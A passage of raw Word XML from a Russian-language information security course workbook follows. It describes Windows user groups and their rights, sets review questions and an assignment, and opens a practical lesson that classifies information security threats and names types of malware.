          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="700"/>
        </w:tabs>
        <w:spacing w:line="252" w:lineRule="auto"/>
        <w:ind w:left="700" w:hanging="342"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>группы, которыми могут быть администраторы, операторы архива, гости и т.д. Используя пункты меню «Действие», «Новый пользователь» и «Свойства» можно</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="233" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>выбрать необходимый тип учетной записи:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="2" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="708"/>
        </w:tabs>
        <w:spacing w:line="254" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="362"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>администраторы, которые имеют доступ ко всем ресурсам операционной системы и ее настройкам;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="1" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="708"/>
        </w:tabs>
        <w:spacing w:line="264" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="362"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>пользователи – могут выполнять большинство пользовательских функций (запуск программ, использование сетевого и локального принтера, завершение работы операционной системы и т.д.), а также могут создавать локальные группы,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="247" w:lineRule="auto"/>
        <w:ind w:left="722"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="page8"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>регулировать их состав, однако не могут получить доступ к общим папкам, создавать локальные принтеры и т.д.;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="3" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="710"/>
        </w:tabs>
        <w:spacing w:line="260" w:lineRule="auto"/>
        <w:ind w:left="722" w:hanging="362"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>операторы архива, которые могут осуществлять архивирование и восстановление файлов в операционной системы, а также вход в операционную систему и завершение ее работы, однако не имеют прав изменения настроек безопасности;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="1" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="710"/>
        </w:tabs>
        <w:spacing w:line="244" w:lineRule="auto"/>
        <w:ind w:left="722" w:hanging="362"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>гости – могут выполнять регистрацию пользователей с помощью учетной записи «Гость» и получать ограниченные права на доступ к ресурсам и настройкам операционной системы;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="3" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="702"/>
        </w:tabs>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:left="702" w:hanging="342"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>опытные пользователи, которые могут создавать учетные записи пользователей,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="6" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="251" w:lineRule="auto"/>
        <w:ind w:left="722"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>модифицировать настройки безопасности только для создаваемых ими учетных записей, создавать локальные группы и модифицировать состав ее участников, а также аналогичные операции с группами «Пользователи», «Гости» и «Опытные пользователи», однако не могут модифицировать участие в группах «Администраторы» и «Операторы архива», не могут быть владельцами файлов, производить архивирование и восстановление фалов, загружать и выгружать драйверы устройств и модифицировать настройки безопасности и журнал событий;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="5" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="710"/>
        </w:tabs>
        <w:spacing w:line="247" w:lineRule="auto"/>
        <w:ind w:left="722" w:hanging="362"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>репликаторы – участником группы могут быть только учетные записи, с помощью которых можно зарегистрироваться в службе репликации контроллера домена, при этом они не должны создавать рабочие учетные записи.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="258" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:right="-1"/>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вопросы по теме</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="23" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1062"/>
        </w:tabs>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:left="1062" w:hanging="354"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Понятие и функции системы защиты информации</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1062"/>
        </w:tabs>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:left="1062" w:hanging="354"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Общие принципы обеспечения информационной безопасности</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1062"/>
        </w:tabs>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:left="1062" w:hanging="354"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Специальные принципы обеспечения информационной безопасности</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1062"/>
        </w:tabs>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:left="1062" w:hanging="354"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Обеспечивающие подсистемы защиты информации</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="206" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:right="-1"/>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задания 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="26" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:left="702"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Используя справочные средства операционной системы Windows найти и отобразить</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="12" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="162"/>
        </w:tabs>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:left="162" w:hanging="162"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>экспортом в Microsoft Word:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1062"/>
        </w:tabs>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:left="1062" w:hanging="354"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>понятия учетной записи и домена и типов доступа к операционной системе: глобальные, локальные, ограниченные и административные;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1062"/>
        </w:tabs>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:left="1062" w:hanging="354"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>описание порядка создания, изменения, активации и удаления учетных записей;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="11" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1062"/>
        </w:tabs>
        <w:spacing w:line="242" w:lineRule="auto"/>
        <w:ind w:left="1062" w:hanging="354"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>основные категории локальных пользователей (пользователи и группы) и конкретных прав каждого вида учетных записей, включая администраторов, пользователей, опытных пользователей, операторов архива, репликаторов и гостей.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1062"/>
        </w:tabs>
        <w:spacing w:line="242" w:lineRule="auto"/>
        <w:ind w:left="1062" w:hanging="354"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="00B45DB0" w:rsidRPr="00B45DB0">
          <w:pgSz w:w="11900" w:h="16840"/>
          <w:pgMar w:top="829" w:right="840" w:bottom="1440" w:left="1418" w:header="0" w:footer="0" w:gutter="0"/>
          <w:cols w:space="0" w:equalWidth="0">
            <w:col w:w="9642"/>
          </w:cols>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="page9"/>
      <w:bookmarkStart w:id="8" w:name="_Toc3808611"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Практическая работа №</w:t>
      </w:r>
      <w:r w:rsidRPr="00B45DB0">
        <w:t>3. Классификация угроз информационной безопасности</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="234"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Методические указания</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="23" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="261" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Под угрозой информационной безопасности понимается случайное или преднамеренное явление или событие, действие или процесс, которые могут привести к искажению, несанкционированному использованию или к уничтожению информационных ресурсов информационной системы, используемых программных и технических средств и соответственно прямому или косвенному моральному или материальному ущербу интересам общества, личности или государства (например, ущерб деловой репутации , необходимость восстановления нарушенных защищаемых информационных ресурсов, невозможность выполнения взятых на себя обязательств перед третьей стороной, снижение эффективности политики государства и т.д.). Реализация угроз информационной безопасности заключается в частичном или полном нарушении работоспособности информационной системы, а также утрате ценности или частичном обесценивании информации в случае нарушения: а) конфиденциальности (при хранении и распространении информации); б) целостности (при изменении или уничтожении информации); в) доступности информации (в случае неполучения или несвоевременного получения информации легальным пользователем).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="12" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>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Информационные угрозы по способу реализации можно разделить на три группы: разглашение, утечка и несанкционированный доступ. В последнем случае имеет место противоправное преднамеренное ознакомление с конфиденциальной информацией недопущенных лиц, нарушение целостности (подделка, модификация, уничтожение) и доступа к защищаемой информации. Информационные угрозы по отношению к объекту информационной безопасности можно подразделить на две основные группы: внутренние и внешние; по причине возникновения на две основные группы: естественные (например, стихийные бедствия, аварии электропитания) и человеческие, которые подразделяются по характеру возникновения на две основные группы: случайные и преднамеренные.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="5" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1015"/>
        </w:tabs>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:firstLine="706"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>последнем случае имеет место целенаправленное воздействие на аппаратные, программные и информационные ресурсы, несанкционированное использование информационных ресурсов по личным противоправным мотивам (например, с целью нанесения ущерба пользователям информационной системы), не оказывая при этом влияния на состояние информационной системы (пассивные) или нарушая нормальный процесс функционирования информационной системы (активные).</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Вредоносное программное обеспечение можно подразделяется на такие классы, как файловые и загрузочные вирусы, компьютерные черви, «троянский конь», макровирусы, логические бомбы, стелс-вирусы (невидимки), полиморфные вирусы (вирусы-призраки) и «бэкдоры».</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Компьютерная преступность – это умышленное нарушение чужих прав и интересов, осуществляемое совершаемые с помощью компьютеров, информационных систем и телекоммуникаций или направленные против них, совершенное во вред подлежащим правовой охране правам и интересам физических и юридических лиц, общества и государства с определенными целями.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="974"/>
        </w:tabs>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
